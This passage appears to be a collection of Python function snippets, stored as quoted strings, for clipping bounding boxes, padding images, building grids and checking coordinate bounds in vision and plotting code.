= np.where(temp[:, 2] > image.shape[0] - 1)[0]\n if len(y2) > 0:\n temp[y2, 0] = image.shape[0] - 1\n x2 = np.where(temp[:, 3] > image.shape[1] - 1)[0]\n if len(x2) > 0:\n temp[x2, 0] = image.shape[1] - 1\n pad_top = np.abs(temp[:, 0] - boxes[:, 0]).astype(np.int)\n pad_left = np.abs(temp[:, 1] - boxes[:, 1]).astype(np.int)\n pad_bottom = np.abs(temp[:, 2] - boxes[:, 2]).astype(np.int)\n pad_right = np.abs(temp[:, 3] - boxes[:, 3]).astype(np.int)\n input_data = np.empty([boxes.shape[0], 3, height, width], dtype=np.float32)\n for i in range(boxes.shape[0]):\n crop_img = image[temp[i, 0]:temp[i, 2] + 1, temp[i, 1]:temp[i, 3] + 1, :]\n crop_img = cv2.copyMakeBorder(crop_img, pad_top[i], pad_bottom[i], \\\n pad_left[i], pad_right[i], cv2.BORDER_CONSTANT, value=0)\n if crop_img is None:\n continue\n crop_img = cv2.resize(crop_img, (width, height)).astype(np.float32)\n crop_img[:, :, 0] -= self.mean[0]\n crop_img[:, :, 1] -= self.mean[1]\n crop_img[:, :, 2] -= self.mean[2]\n crop_img *= self.scale_factor\n crop_img = np.transpose(crop_img, (2, 0, 1))\n input_data[i] = crop_img.copy()\n return input_data", "def _get_padded_grid_(ax):\n ax_pad = np.zeros(ax.size + 2)\n ax_pad[1:-1] = ax\n ax_pad[0] = ax[0] - (ax[2] - ax[1])\n ax_pad[-1] = ax[-1] + (ax[2] - ax[1])\n\n return ax_pad", "def crop_mask(mask, crop_offset=0.5):\n maxx, maxy, minx, miny = 0, 0, 0, 0\n for r in range(0, mask.shape[0]):\n if np.min(mask[r]) < 255:\n minx = int(r + mask.shape[0] * (crop_offset / 100))\n break\n\n for r in range(mask.shape[0] - 1, 0, -1):\n if np.min(mask[r]) < 255:\n maxx = int(r - mask.shape[0] * (crop_offset / 100))\n break\n\n for c in range(0, mask.shape[1]):\n if np.min(mask[:, c]) < 255:\n miny = int(c + mask.shape[1] * (crop_offset / 100))\n break\n\n for c in range(mask.shape[1] - 1, 0, -1):\n if np.min(mask[:, c]) < 255:\n maxy = int(c - mask.shape[1] * (crop_offset / 100))\n break\n\n return (maxx, maxy, minx, miny)", "def _grid_around_star(self, x0, y0, data):\n lenx, leny = data.shape\n xmin, xmax = max(x0 - self._box / 2, 0), min(x0 + self._box / 2 + 1, lenx - 1)\n ymin, ymax = 
max(y0 - self._box / 2, 0), min(y0 + self._box / 2 + 1, leny - 1)\n return np.mgrid[int(xmin) : int(xmax), int(ymin) : int(ymax)]", "def boundary1(self,image,i,j):\r\n if((j >=375- self.padding) and (j <=625+ self.padding ) and (i >= 425- self.padding) and (i <= 575+ self.padding)):\r\n image[self.maximum_size-i,j,:]=0,0,0\r\n self.image_p[i,j,:]=2", "def adjustCoordByBorders(self, x, y):\n (x_offset, y_offset) = (0, 0)\n if (127 < x < (255+4)):\n x_offset -= 4\n \n if (31 < y < (63+4*1)):\n y_offset -= 4\n elif ( (63+4*1) < y < (95+4*2) ):\n y_offset -= 4*2\n elif ( (95+4*2) < y < (127+4*3) ):\n y_offset -= 4*3\n elif ( (127+4*3) < y < (159+4*4) ):\n y_offset -= 4*4\n elif ( (159+4*4) < y < (191+4*5) ):\n y_offset -= 4*5\n elif ( (191+4*5) < y < (223+4*6) ):\n y_offset -= 4*6\n elif ( (223+4*6) < y < (255+4*7) ):\n y_offset -= 4*7\n return x_offset, y_offset", "def _in_bounds(self, x, y):\r\n return 0 <= x < 8 and 0 <= y < 8", "def _clip_boxes(boxes, im_shape):\n # x1 >= 0\n boxes[:, 0::4] = np.maximum(boxes[:, 0::4], 0)\n # y1 >= 0\n boxes[:, 1::4] = np.maximum(boxes[:, 1::4], 0)\n # x2 < im_shape[1]\n boxes[:, 2::4] = np.minimum(boxes[:, 2::4], im_shape[1] - 1)\n # y2 < im_shape[0]\n boxes[:, 3::4] = np.minimum(boxes[:, 3::4], im_shape[0] - 1)\n return boxes", "def _clip_boxes(boxes, im_shape):\n # x1 >= 0\n boxes[:, 0::4] = np.maximum(boxes[:, 0::4], 0)\n # y1 >= 0\n boxes[:, 1::4] = np.maximum(boxes[:, 1::4], 0)\n # x2 < im_shape[1]\n boxes[:, 2::4] = np.minimum(boxes[:, 2::4], im_shape[1] - 1)\n # y2 < im_shape[0]\n boxes[:, 3::4] = np.minimum(boxes[:, 3::4], im_shape[0] - 1)\n return boxes", "def _compute_equal_axes_ranges(x_min, x_max, y_min, y_max):\n\n x_axis_min, x_axis_max, y_axis_min, y_axis_max = x_min, x_max, y_min, y_max\n x_range, y_range = abs(x_max - x_min), abs(y_max - y_min)\n if x_range > y_range:\n y_center = (y_max + y_min) / 2\n y_axis_max = y_center + x_range / 2\n y_axis_min = y_center - x_range / 2\n else:\n x_center = (x_max + x_min) / 2\n x_axis_max = x_center + y_range / 2\n x_axis_min = x_center - y_range / 2\n\n return x_axis_min, x_axis_max, y_axis_min, y_axis_max", "def clip_grid(grid, xr, yr, extra_m=5000):\n\n min_x = np.min(xr)\n min_y = np.min(yr)\n max_x = np.max(xr)\n max_y = np.max(yr)\n\n mask_x = np.logical_and(grid.x['data'] > min_x - extra_m,\n grid.x['data'] < max_x + extra_m)\n mask_y = np.logical_and(grid.y['data'] > min_y - extra_m,\n grid.y['data'] < max_y + extra_m)\n\n grid.x['data'] = grid.x['data'][mask_x]\n grid.y['data'] = grid.y['data'][mask_y]\n for f in grid.fields.keys():\n nz = len(grid.fields[f]['data']) # Nb of z levels\n grid.fields[f]['data'] = grid.fields[f]['data'][np.ix_(range(nz),\n mask_y, mask_x)]\n grid.nx = len(grid.x['data'])\n grid.ny = len(grid.y['data'])\n return grid", "def visualize_grid(Xs, ubound=255.0, padding=1):\n pixel_sz = 2\n (H, W, C, N) = Xs.shape\n\n Xs_resize = np.zeros((H*pixel_sz, W*pixel_sz, C, N))\n Xs = (ubound*(Xs-np.min(Xs))/(np.max(Xs)-np.min(Xs))).astype('uint8')\n\n for c in range(C):\n for n in range(N):\n Xs_resize[:,:,c,n] = imresize(Xs[:,:,c,n], 200, interp='nearest')\n Xs = Xs_resize\n\n (H, W, C, N) = Xs.shape\n low, high = np.min(Xs), np.max(Xs)\n\n if C==1 or C==3:\n grid_size_H = int(ceil(sqrt(N)))\n grid_size_W = int(ceil(sqrt(N)))\n else:\n grid_size_H = N\n grid_size_W = C\n\n count = 0\n grid_height = H * grid_size_H + padding * (grid_size_H-1)\n grid_width = W * grid_size_W + padding * (grid_size_W-1)\n grid = np.zeros((grid_height, grid_width, C))\n y0, y1 = 0, H\n for y in 
range(grid_size_H):\n x0, x1 = 0, W\n for x in range(grid_size_W):\n if C==1 or C==3:\n img = Xs[:,:,:,count]\n count += 1\n else:\n img = np.expand_dims(Xs[:,:,x,y], axis=-1)\n\n grid[y0:y1, x0:x1, :] = ubound * (img - low) / (high - low)\n x0 += W + padding\n x1 += W + padding\n\n y0 += H + padding\n y1 += H + padding\n\n if C!=3:\n grid = grid[:,:,0]\n return grid", "def _fix_span(x, y, xmin, xmax):\n if x.ndim != 1:\n return x, y\n\n # Roll in same direction if some points on right-edge extend\n # more than 360 above min longitude; *they* should be on left side\n lonroll = np.where(x > xmin + 360)[0] # tuple of ids\n if lonroll.size: # non-empty\n roll = x.size - lonroll.min()\n x = np.roll(x, roll)\n y = np.roll(y, roll, axis=-1)\n x[:roll] -= 360 # make monotonic\n\n # Set NaN where data not in range xmin, xmax. Must be done\n # for regional smaller projections or get weird side-effects due\n # to having valid data way outside of the map boundaries\n y = y.copy()\n if x.size - 1 == y.shape[-1]: # test western/eastern grid cell edges\n y[..., (x[1:] < xmin) | (x[:-1] > xmax)] = np.nan\n elif x.size == y.shape[-1]: # test the centers and pad by one for safety\n where = np.where((x < xmin) | (x > xmax))[0]\n y[..., where[1:-1]] = np.nan\n\n return x, y", "def calculate_min_max_tiles(self):", "def _cell_bounds_xy(self, x, y, dx = None):\n\t\tif dx is None:\n\t\t\tlev = bhpix.get_pixel_level(x, y)\n\t\t\tdx = bhpix.pix_size(lev)\n\t\t\t##dx = bhpix.pix_size(self.level)\n\n\t\tbounds = Polygon.Shapes.Rectangle(dx)\n\t\tbounds.shift(x - 0.5*dx, y - 0.5*dx);\n\n\t\tif fabs(fabs(x) - fabs(y)) == 0.5:\n\t\t\t# If it's a \"halfpixel\", return a triangle\n\t\t\t# by clipping agains the sky\n\t\t\tbounds &= bn.ALLSKY\n\n\t\treturn bounds", "def _filter_img_boxes(boxes, im_info):\n padding = 50\n w_min = -padding\n w_max = im_info[1] + padding\n h_min = -padding\n h_max = im_info[0] + padding\n keep = np.where((w_min <= boxes[:,0]) & (boxes[:,2] <= w_max) & (h_min <= boxes[:,1]) &\n (boxes[:,3] <= h_max))[0]\n return keep", "def sanitize_coordinates(_x1, _x2, img_size: int, padding: int = 0, cast: bool = True):\n _x1 = _x1 * img_size\n _x2 = _x2 * img_size\n if cast:\n _x1 = _x1.long()\n _x2 = _x2.long()\n coordinates_min = P.Minimum()\n coordinates_max = P.Maximum()\n x1 = coordinates_min(_x1, _x2)\n x2 = coordinates_max(_x1, _x2)\n\n select = P.Select()\n zeroslike = P.ZerosLike()\n oneslike = P.OnesLike()\n min_tensor = zeroslike(x1 - padding)\n x1 = select(min_tensor > x1 - padding, min_tensor, x1 - padding)\n\n max_tensor = oneslike(x2 + padding) * img_size\n x2 = select(x2 + padding > max_tensor, max_tensor, x2 + padding)\n\n\n return x1, x2", "def define_grid():\n grid_left = np.array([[-13.1000000000000, -35.5000000000000, -48.3000000000000, -60, -16.9000000000000,\n -34.8000000000000, -67.5000000000000, -46.1000000000000, -59.8000000000000,\n -14.2000000000000, -28.3000000000000, -42.3000000000000, -67.6000000000000,\n -50.5000000000000, -14.6000000000000, -60.9000000000000, -31.6000000000000,\n -5.10000000000000, -65.6000000000000, -41.8000000000000, -55.1000000000000,\n -22.7000000000000, -5.80000000000000, -49.2000000000000, -34.5000000000000,\n -61.5500000000000, -63.6000000000000, -40.4000000000000, -48.7000000000000,\n -21.8000000000000, -58.2000000000000, -7, -36.3000000000000, -48.1000000000000,\n -56.8000000000000, -7.30000000000000, -22.2000000000000, -36.8000000000000,\n -46.8000000000000],\n [-67.7000000000000, -60, -55.1000000000000, -51.8000000000000, -51.6000000000000,\n 
-49.3000000000000, -47.1000000000000, -43.7000000000000, -39.6000000000000,\n -39.1000000000000, -31.2000000000000, -30.7000000000000, -30.1000000000000,\n -24.4000000000000, -22.7000000000000, -18.7000000000000, -16.9000000000000,\n -12.6000000000000, -10.8000000000000, -10.2000000000000, -4.01000000000000, 1.20000000000000,\n 2.80000000000000, 3.70000000000000, 3.90000000000000, 6.20000000000000, 8.30000000000000,\n 11.8000000000000, 14.5000000000000, 16, 18.2000000000000, 18.4000000000000, 19.9000000000000,\n 24.6000000000000, 28.5200000000000, 33.8000000000000, 35, 35.4000000000000,\n 35.6000000000000],\n [69.1000000000000, 66, 58.2000000000000, 48, 78, 71.7000000000000, 31, 61.1000000000000,\n 53.3000000000000, 81.1000000000000, 76, 70.2000000000000, 41.2000000000000, 64.4000000000000,\n 80.2000000000000, 50.9000000000000, 75.2000000000000, 77.3000000000000, 37.8000000000000, 67,\n 53.2000000000000, 72, 74.8000000000000, 54.7000000000000, 66.5000000000000, 35.9000000000000,\n 25.7000000000000, 60.7000000000000, 50.5000000000000, 68.9000000000000, 27.3000000000000,\n 70.3000000000000, 59.6000000000000, 44, 20.8000000000000, 61.7000000000000, 57.2000000000000,\n 47, 36]])\n stn_left = np.array([[-14.6, -13.2, -11.7, -9.10, -11.7, -13.2, -7.90, -10],\n [-15.1, -15.1, -15.1, -12.6, -12.6, -12.6, -9.40, -10.1],\n [-5.40, -7.20, -8.70, -8.70, -7.50, -5.10, -10.3, -7.80]])\n grid_right = np.copy(grid_left)\n grid_right[0, :] = grid_right[0, :] * -1\n stn_right = np.copy(stn_left)\n stn_right[0, :] = stn_right[0, :] * -1\n\n return grid_left, grid_right, stn_left, stn_right", "def remove_border_vals(img, x: torch.Tensor, y: torch.Tensor, c: torch.Tensor) -> Tuple[torch.Tensor, torch.Tensor]: \r\n\r\n new_x = img.shape[3] - 8\r\n new_y = img.shape[2] - 8\r\n \r\n mask = x.ge(8) & x.le(new_x) & y.ge(8) & y.le(new_y)\r\n x = torch.masked_select(x, mask)\r\n y = torch.masked_select(y, mask)\r\n c = torch.masked_select(c, mask)\r\n\r\n return x, y, c", "def _clip_tiled_boxes(self, boxes, im_shape):\n assert boxes.shape[1] % 4 == 0, \\\n 'boxes.shape[1] is {:d}, but must be divisible by 4.'.format(\n boxes.shape[1]\n )\n # x1 >= 0\n boxes[:, 0::4] = np.maximum(np.minimum(boxes[:, 0::4], im_shape[1] - 1), 0)\n # y1 >= 0\n boxes[:, 1::4] = np.maximum(np.minimum(boxes[:, 1::4], im_shape[0] - 1), 0)\n # x2 < im_shape[1]\n boxes[:, 2::4] = np.maximum(np.minimum(boxes[:, 2::4], im_shape[1] - 1), 0)\n # y2 < im_shape[0]\n boxes[:, 3::4] = np.maximum(np.minimum(boxes[:, 3::4], im_shape[0] - 1), 0)\n return boxes", "def boundary2(self,image,i,j):\r\n if((j >=725- self.padding) and (j <=875+ self.padding ) and (i >= 200- self.padding) and (i <= 400+ self.padding)):\r\n image[self.maximum_size-i,j,:]=0,0,0\r\n self.image_p[i,j,:]=2", "def crop(img, boundaries):\n minx, miny, maxx, maxy = boundaries\n return img[miny:maxy, minx:maxx]", "def in_bounds(self, x, y):\n return x >= 0 and x < 8 and y >= 0 and y < 8", "def create_grid(xlim, ylim, step):\n x_range = np.arange(xlim[0], xlim[1], step)\n y_range = np.arange(ylim[0], ylim[1], step)\n return x_range, y_range", "def expanded_boundaries(self):\n width = self._points[0][3][0] - self._points[0][1][0]\n height = self._points[0][3][1] - self._points[0][1][1]\n factor = np.multiply((width, height), Window.BORDER)\n return (\n np.subtract(self._points[0][1], factor),\n np.add(self._points[0][3], factor))", "def check_image_size(self, x):\n _, _, h, w = x.size()\n mod_pad_h = (self.window_size -\n h % self.window_size) % self.window_size\n mod_pad_w = 
(self.window_size -\n w % self.window_size) % self.window_size\n x = F.pad(x, (0, mod_pad_w, 0, mod_pad_h), 'reflect')\n return x", "def get_bounds(self):\n occupied_locations = self.board.keys()\n min_x = min(p[0] for p in occupied_locations)\n max_x = max(p[0] for p in occupied_locations)\n min_y = min(p[1] for p in occupied_locations)\n max_y = max(p[1] for p in occupied_locations)\n return ((min_x, max_x), (min_y, max_y))", "def square_boundaries(px , py, pz, incx, incy, incz, min_x, min_y, min_z, max_x, max_y, max_z):\n\n if px < min_x or px > max_x: \n pcx = px - incx \n\n if py < min_y or py > max_y:\n pcy = py - incy \n\n if pz < min_z or pz > max_z:\n pcz = pz - incz \n\n return pcx, pcy, pcz", "def _bbox_clip(self, bbox, img_h, img_w):\n bbox[0] = bbox[0].clamp(0., img_w)\n bbox[1] = bbox[1].clamp(0., img_h)\n bbox[2] = bbox[2].clamp(10., img_w)\n bbox[3] = bbox[3].clamp(10., img_h)\n return bbox", "def pad_vector_grid(vector_sequences, grid_shape_sequences, max_grid_shape = None, dtype = 'int32', padding = 'pre', truncating = 'pre', value = 0.):\n\t\n row_lengths = [s[0] for s in grid_shape_sequences]\n col_lengths = [s[1] for s in grid_shape_sequences]\n assert vector_sequences[0] is not None \n dim = vector_sequences[0].shape[1] \n nb_samples = len(vector_sequences)\n if max_grid_shape is None:\n max_grid_shape = (np.max(row_lengths), np.max(col_lengths))\n x = np.ones( (nb_samples,)+ max_grid_shape +(dim,)).astype(dtype)* value \n mask = np.zeros((nb_samples,)+max_grid_shape)\n for idx, vs in enumerate(vector_sequences):\n if len(vs) == 0:\n continue\n grid_vec = np.reshape(vs,(tuple(grid_shape_sequences[idx]) + (dim,)) , order='F')\n # testiing code\n #patchRow, patchCol = [25,25]\n #showGrid(grid_vec, grid_shape_sequences[idx], [patchRow, patchCol]) \n if truncating == 'pre': \n trunc = grid_vec[-max_grid_shape[0]:,-max_grid_shape[1]:,:]\n elif truncating == 'post':\n trunc = grid_vec[:max_grid_shape[0],:max_grid_shape[1],:]\n else:\n raise ValueError(\"Truncating type '%s' not understood\" % padding)\n \n if padding == 'post':\n x[idx,:trunc.shape[0],:trunc.shape[1],:] = trunc.copy()\n mask[idx, :trunc.shape[0],:trunc.shape[1]] = 1\n elif padding == 'pre':\n x[idx, -trunc.shape[0]:,-trunc.shape[1]:, :] = trunc.copy()\n mask[idx, -trunc.shape[0]:, -trunc.shape[1]:] = 1\n else:\n raise ValueError(\"PAdding type '%s' not understood\" % padding) \n #showGrid(x[idx,::], max_grid_shape, [patchRow, patchCol]) \n return x , mask# -*- coding: utf-8 -*-", "def _update_limits(self):\n if self.pos_x > self.max_x:\n self.max_x = self.pos_x\n if self.pos_y > self.max_y:\n self.max_y = self.pos_y\n if self.pos_x < self.min_x:\n self.min_x = self.pos_x\n if self.pos_y < self.min_y:\n self.min_y = self.pos_y", "def _xywh2min_max(box):\n x, y, w, h = box\n return np.array([x, y, x+w, y+h])", "def _build_list_of_excluded_pixels2(self, exclude_zones, img_width, img_height):\n \n full_image = numpy.ones((img_height, img_width), dtype=uint8)\n for x, y, width, height in exclude_zones:\n \n # creates a matrix where 0 is placed on pixels to exclude, and 1 on pixel to keep\n exclusion = numpy.zeros((height, width), dtype=uint8)\n exclusion = numpy.pad(exclusion, ((min(y, img_height) , max(0, img_height - (y + height))), (min(x, img_width), max(0, img_width - (x + width)))), constant_values=1)\n \n full_image *= exclusion[0:img_height, 0:img_width] # crop exclusion array if it's size is higher than image (exclusion zone outside of image dimensions)\n \n return full_image", "def limit_roi(roi, 
im_height, im_width):\r\n left = max(0, roi[0])\r\n top = max(0, roi[1])\r\n right = min(im_width - 1, roi[2])\r\n bottom = min(im_height - 1, roi[3])\r\n\r\n return [left, top, right, bottom]", "def set_lim(x, y, **kws):\n per = kws['per']\n min_per = 50 - per/2\n max_per = per/2 + 50\n xper = np.nanpercentile(x,[min_per,max_per])\n yper = np.nanpercentile(y,[min_per,max_per])\n ax = plt.gca()\n ax.set_xlim(xper)\n ax.set_ylim(yper)", "def boundary_check(limits : tuple, coords : tuple) -> bool:\n xl,xh,yl,yh = limits\n x,y = coords\n bound_x = xl <= x and x < xh\n bound_y = yl <= y and y < yh\n return bound_x and bound_y", "def rescale_axes(self, x=True, y=True, xlim=None, ylim=None, \n tighten_up=0): \n \n # First, figure out what limits should be\n col_xlim = [[1e10, -1e10] for i in range(self.dims[0])]\n row_ylim = [[1e10, -1e10] for i in range(self.dims[1])]\n \n # Loop over axes\n for i in range(self.N):\n if self.grid[i] is None:\n continue\n \n # column, row\n j, k = self.axis_position(i)\n \n if self.above_diagonal(i):\n continue\n \n if x and xlim is None:\n col_xlim[j][0] = min(col_xlim[j][0], self.grid[i].dataLim.min[0])\n col_xlim[j][1] = max(col_xlim[j][1], self.grid[i].dataLim.max[0]) \n elif x:\n col_xlim[j][0] = xlim[0]\n col_xlim[j][1] = xlim[1]\n \n if self.diagonal is not None and i in self.diag:\n continue\n \n if y and (ylim is None): \n row_ylim[k][0] = min(row_ylim[k][0], self.grid[i].dataLim.min[1])\n row_ylim[k][1] = max(row_ylim[k][1], self.grid[i].dataLim.max[1]) \n elif y:\n row_ylim[k][0] = ylim[0]\n row_ylim[k][1] = ylim[1] \n \n # Apply limits \n for i in range(self.N):\n if self.grid[i] is None:\n continue\n \n # column, row \n j, k = self.axis_position(i)\n \n col_tmp = [col_xlim[j][0] * (1. + tighten_up * np.sign(col_xlim[j][0])),\n col_xlim[j][1] * (1. - tighten_up * np.sign(col_xlim[j][1]))]\n \n row_tmp = [row_ylim[k][0] * (1. + tighten_up * np.sign(row_ylim[k][0])),\n row_ylim[k][1] * (1. 
- tighten_up * np.sign(row_ylim[k][1]))]\n\n # Kludge\n if np.all(np.isfinite(col_tmp)):\n self.grid[i].set_xlim(col_tmp)\n \n if self.diagonal and i in self.diag:\n continue\n\n if np.all(np.isfinite(row_tmp)):\n self.grid[i].set_ylim(row_tmp)\n\n pl.draw()", "def bounds(self):\n return self.xmin, self.xmax, self.ymin, self.ymax", "def get_limits(self, idx):\n if idx < self.nb_sub_images - 1:\n pixel_step = self.window_size - self.recovery\n\n return idx * pixel_step, idx * pixel_step + self.window_size\n elif idx == self.nb_sub_images - 1:\n return - self.window_size, None\n else:\n return None, None", "def make_tiles_limits(im, n_splits, margin=0):\n \n if n_splits == 1:\n return [0, im.shape[1], 0, im.shape[0]]\n # number of splits per axis\n ax_splits = int(np.log2(n_splits))\n x_segments = split_range(im.shape[1], ax_splits)\n y_segments = split_range(im.shape[0], ax_splits)\n \n if margin > 0:\n x_segments = extend_indices(x_segments, margin=margin)\n y_segments = extend_indices(y_segments, margin=margin)\n \n # make combinations of [xmin, xmax, ymin, ymax] indices of tiles\n tiles_indices = []\n for xlim in x_segments:\n for ylim in y_segments:\n tiles_indices.append(xlim + ylim)\n return tiles_indices", "def internal_bounds(self) -> tuple[float, float, float, float]:\n xres, yres = self.res\n w, s, e, n = self.bounds\n y0, y1 = (n, s) if yres < 0 else (s, n)\n x0, x1 = (e, w) if xres < 0 else (w, e)\n return x0, y0, x1, y1", "def canvas_bounds(self) -> utils.BoxRegion:", "def checkCanvasBoundsAndWrap(self):\n #check along the x axis\n if (self.xPos<0):\n self.setXPos(self.canvasIGetDrawnOnsWidth)\n \n elif (self.xPos>self.canvasIGetDrawnOnsWidth):\n self.setXPos(0)\n #check along the y axis\n if (self.yPos<0):\n self.setYPos(self.canvasIGetDrawnOnsHeight)\n \n elif (self.yPos>self.canvasIGetDrawnOnsHeight):\n self.setYPos(0)", "def get_padding_sizes(self, div, dim):\n # ghost cells in the y direction\n target_shape = div * np.ceil(dim / div)\n target_shape_diff = target_shape - dim\n\n pad_low = int(np.ceil(target_shape_diff / 2.0))\n pad_high = int(np.floor(target_shape_diff / 2.0))\n\n return pad_low, pad_high", "def _edit_border_tiles(self, vmf: VMF, seg_min: Vec, seg_max: Vec, border: bool, blacken: bool) -> None:\n up = abs(self.up_axis)\n forward = (seg_max - seg_min).norm()\n norm_dir = self.normal().axis()\n\n tiledefs_up: list[tiling.TileDef] = []\n tiledefs_dn: list[tiling.TileDef] = []\n\n overlay_len = int((seg_max - seg_min).mag())\n\n # We need to snap the axis normal_axis to the grid, since it could\n # be forward or back.\n min_pos = seg_min.copy()\n min_pos[norm_dir] = min_pos[norm_dir] // 128 * 128 + 64\n\n u_ax, v_ax = Vec.INV_AXIS[up.axis()]\n side_dir = Vec.dot(abs(Vec.cross(up, forward)), seg_min - min_pos)\n side_ind = round((side_dir + 48) / 32, 2) # 0/1/2/3 for the center of tiles.\n # 4.5 -> [4, 5] and 4 -> [4].\n pos_iter = sorted({round(side_ind - 0.25), round(side_ind + 0.25)})\n if u_ax == forward.axis():\n uv_pos = [\n (u, v)\n for u in range(4)\n for v in pos_iter\n ]\n elif v_ax == forward.axis():\n uv_pos = [\n (u, v)\n for u in pos_iter\n for v in range(4)\n ]\n else: # Should be impossible?\n uv_pos = []\n\n for offset in range(64, overlay_len, 128):\n # Each position on top or bottom, inset 64 from each end.\n # First check if the tiles themselves are present, then check if any of the\n # subtiles are present - blackening on the way if required.\n pos = min_pos + offset * forward\n tile_cat = []\n try:\n top_tile = tiling.TILES[\n (pos + 128 * 
up).as_tuple(),\n (-up).as_tuple()\n ]\n except KeyError:\n pass\n else:\n tile_cat.append((tiledefs_up, top_tile))\n try:\n btm_tile = tiling.TILES[\n (pos - 128 * up).as_tuple(),\n up.as_tuple()\n ]\n except KeyError:\n pass\n else:\n tile_cat.append((tiledefs_dn, btm_tile))\n for tiledefs, tile in tile_cat:\n found = False\n for u, v in uv_pos:\n subtile = tile[u, v]\n if subtile.is_tile:\n found = True\n if blacken:\n tile[u, v] = subtile.as_black\n if found:\n tiledefs.append(tile)\n\n if not border or (not tiledefs_up and not tiledefs_dn):\n return\n\n overlay_thickness = options.get(int, 'fizz_border_thickness')\n overlay_repeat = options.get(int, 'fizz_border_repeat')\n flip_uv = options.get(bool, 'fizz_border_vertical')\n\n if flip_uv:\n u_rep = 1.0\n v_rep = overlay_len / overlay_repeat\n else:\n u_rep = overlay_len / overlay_repeat\n v_rep = 1.0\n\n cent_pos = (seg_min + seg_max) / 2\n\n if tiledefs_up:\n over = srctools.vmf.make_overlay(\n vmf,\n normal=-up,\n origin=cent_pos + 64 * up,\n uax=forward * overlay_len,\n vax=Vec.cross(up, forward) * overlay_thickness,\n material=texturing.SPECIAL.get(cent_pos + 64 * up, 'fizz_border'),\n surfaces=[],\n u_repeat=u_rep,\n v_repeat=v_rep,\n swap=flip_uv,\n )\n for tile in tiledefs_up:\n tile.bind_overlay(over)\n\n if tiledefs_dn:\n over = srctools.vmf.make_overlay(\n vmf,\n normal=up,\n origin=cent_pos - 64 * up,\n uax=forward * overlay_len,\n vax=Vec.cross(-up, forward) * overlay_thickness,\n material=texturing.SPECIAL.get(cent_pos - 64 * up, 'fizz_border'),\n surfaces=[],\n u_repeat=u_rep,\n v_repeat=v_rep,\n swap=flip_uv,\n )\n for tile in tiledefs_dn:\n tile.bind_overlay(over)", "def clip_boxes(boxes, im_shape):\n boxes[:, 0::4] = np.maximum(np.minimum(boxes[:, 0::4], im_shape[1] - 1), 0) # x1 >= 0\n boxes[:, 1::4] = np.maximum(np.minimum(boxes[:, 1::4], im_shape[0] - 1), 0) # y1 >= 0\n boxes[:, 2::4] = np.maximum(np.minimum(boxes[:, 2::4], im_shape[1] - 1), 0) # x2 < im_shape[1]\n boxes[:, 3::4] = np.maximum(np.minimum(boxes[:, 3::4], im_shape[0] - 1), 0) # y2 < im_shape[0]\n return boxes", "def pad(self):\n if self._mg_problem.boundaries[0] == 'periodic':\n # left side\n self.left[:] = self.mid[-self.borders[0]:]\n # right side\n self.right[:] = self.mid[:self.borders[1]]\n elif self._mg_problem.boundaries[0] == 'dirichlet':\n\n # left from border\n l_f_b = self.space_tensor[0:self.borders[0]]\n # right_from_border\n r_f_b = self.space_tensor[-self.borders[1]:]\n # left side\n self.left[:] = self.fl(l_f_b)\n # right side\n self.right[:] = self.fr(r_f_b)", "def pad_bounds(\n bounds: tuple[int, int, int, int],\n padding: int | tuple[int, int] | tuple[int, int, int, int],\n) -> tuple[int, int, int, int]:\n if np.size(bounds) % 2 != 0:\n msg = \"Bounds must have an even number of elements.\"\n raise ValueError(msg)\n ndims = np.size(bounds) // 2\n\n if np.size(padding) not in [1, 2, np.size(bounds)]:\n msg = \"Invalid number of padding elements.\"\n raise ValueError(msg)\n\n if np.size(padding) == 1 or np.size(padding) == np.size(bounds):\n pass\n elif np.size(padding) == ndims: # pragma: no cover\n padding = np.tile(padding, 2)\n\n signs = np.repeat([-1, 1], ndims)\n return np.add(bounds, padding * signs)", "def pad(img, pad_size=32):\n\n if pad_size == 0:\n return img\n\n height, width = img.shape[:2]\n\n if height % pad_size == 0:\n y_min_pad = 0\n y_max_pad = 0\n else:\n y_pad = pad_size - height % pad_size\n y_min_pad = int(y_pad / 2)\n y_max_pad = y_pad - y_min_pad\n\n if width % pad_size == 0:\n x_min_pad = 0\n x_max_pad = 
0\n else:\n x_pad = pad_size - width % pad_size\n x_min_pad = int(x_pad / 2)\n x_max_pad = x_pad - x_min_pad\n\n img = cv2.copyMakeBorder(img, y_min_pad, y_max_pad, x_min_pad, x_max_pad, cv2.BORDER_REFLECT_101)\n\n return img, (x_min_pad, y_min_pad, x_max_pad, y_max_pad)", "def view_limits(self, dmin, dmax):\n base = self._select_base(dmin, dmax)\n if mpl.rcParams['axes.autolimit_mode'] == 'round_numbers':\n vmin = base.le(dmin)\n vmax = base.ge(dmax)\n if vmin == vmax:\n vmin -= 1\n vmax += 1\n else:\n vmin = dmin\n vmax = dmax\n\n return mtransforms.nonsingular(vmin, vmax)", "def bounds(self) -> Tensor:\n return torch.cat([self.mins, self.mins + self.ranges], dim=-2)", "def __check_bbox_area(min_y, min_x, max_y, max_x, delta=0.05):\n height = max_y - min_y\n width = max_x - min_x\n\n def __adjust_bbox_boundaries(min_coord, max_coord):\n # Make sure max is never 0 and min is never 1.\n max_coord = tf.maximum(max_coord, 0.0 + delta)\n min_coord = tf.minimum(min_coord, 1.0 - delta)\n return min_coord, max_coord\n\n min_y, max_y = tf.cond(tf.equal(height, 0.0),\n lambda: __adjust_bbox_boundaries(min_y, max_y),\n lambda: (min_y, max_y))\n min_x, max_x = tf.cond(tf.equal(width, 0.0),\n lambda: __adjust_bbox_boundaries(min_x, max_x),\n lambda: (min_x, max_x))\n return min_y, min_x, max_y, max_x", "def _mask_grid(self):\n xg, yg = self._build_grid()\n mask = self._build_mask(xg, yg)\n mask = mask.reshape(xg.shape)\n\n return xg, yg, mask", "def handle_bad_corners(left, right, top, bottom, im_w, im_h):\n left = np.maximum(0, left)\n top = np.maximum(0, top)\n right = np.minimum(im_w, right)\n bottom = np.minimum(im_h, bottom) \n return (left, right, top, bottom)", "def getbbox(self):\r\n img_ = (self._instance > 0)\r\n rows = np.any(img_, axis=1)\r\n cols = np.any(img_, axis=0)\r\n rmin, rmax = np.argmax(rows), img_.shape[0] - 1 - np.argmax(np.flipud(rows))\r\n cmin, cmax = np.argmax(cols), img_.shape[1] - 1 - np.argmax(np.flipud(cols))\r\n return (rmin, rmax, cmin, cmax)", "def bounding_box(self, grid=1):\n supp = self.support\n grid = [np.linspace(s[0], s[1], grid+1) for s in supp]\n X = self.grid_eval(grid)\n X.shape = (-1, self.dim)\n return tuple((X[:, d].min(), X[:, d].max()) for d in range(self.dim))", "def make_grid_bbox(tensor, box, nrow=8, padding=2,\n normalize=False, range=None, \n scale_each=False, pad_value=0, 